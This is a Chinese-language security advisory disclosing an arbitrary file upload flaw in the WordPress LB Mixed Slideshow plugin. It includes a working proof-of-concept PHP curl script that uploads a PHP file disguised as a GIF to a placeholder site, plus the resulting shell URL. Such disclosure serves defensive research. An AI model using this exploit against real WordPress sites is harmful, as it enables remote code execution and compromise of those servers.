发布日期:2012-06-19
更新日期:2012-06-19受影响系统:
WordPress LB Mixed Slideshow Plugin 1.x
描述:
--------------------------------------------------------------------------------
WordPress是一种使用PHP语言和MySQL数据库开发的Blog(博客、网志)引擎,用户可以在支持PHP和MySQL数据库的服务器上建立自己的Blog。LB Mixed Slideshow plugin for WordPress 1.0在实现上存在安全漏洞,wp-content/plugins/lb-mixed-slideshow/libs/uploadify/upload.php脚本没有正确验证上传的文件,可被恶意利用执行PHP代码。<*来源:Sammy Forgit
链接:http://secunia.com/advisories/49610/
http://www.opensyscom.fr/Actualites/wordpress-plugins-lb-mixed-slideshow-arbitrary-file-upload-vulnerability.html
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!Sammy Forgit ()提供了如下测试方法:PostShell.php
<?php$uploadfile="lo.php.gif";$ch = curl_init("http://www.exemple.com/wordpress/wp-content/plugins/lb-mixed-slideshow/libs/uploadify/upload.php?element_name=images&gid=1");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array("images"=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";?>Shell Access : http://www.exemple.com/wordpress/wp-content/plugins/lb-mixed-slideshow/gallery/1/lo.php.giflo.php.gif
<?php
phpinfo();
?>建议:
--------------------------------------------------------------------------------
厂商补丁:WordPress
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://wordpress.org/Joomla! Dione FileUploader模块任意文件上传漏洞Joomla! Maian Media组件任意文件上传漏洞相关资讯 WordPress WordPress漏洞 任意文件上传漏洞
- Wordpress 跨站请求伪造漏洞(CVE- (今 16:15)
- WordPress wp_get_attachment_link (06月30日)
- WordPress customizer重定向限制绕 (06月30日)
| - Wordpress Admin API拒绝服务漏洞( (今 16:14)
- WordPress column_title跨站脚本漏 (06月30日)
- WordPress 访问限制绕过漏洞(CVE- (06月30日)
|
本文评论 查看全部评论 (0)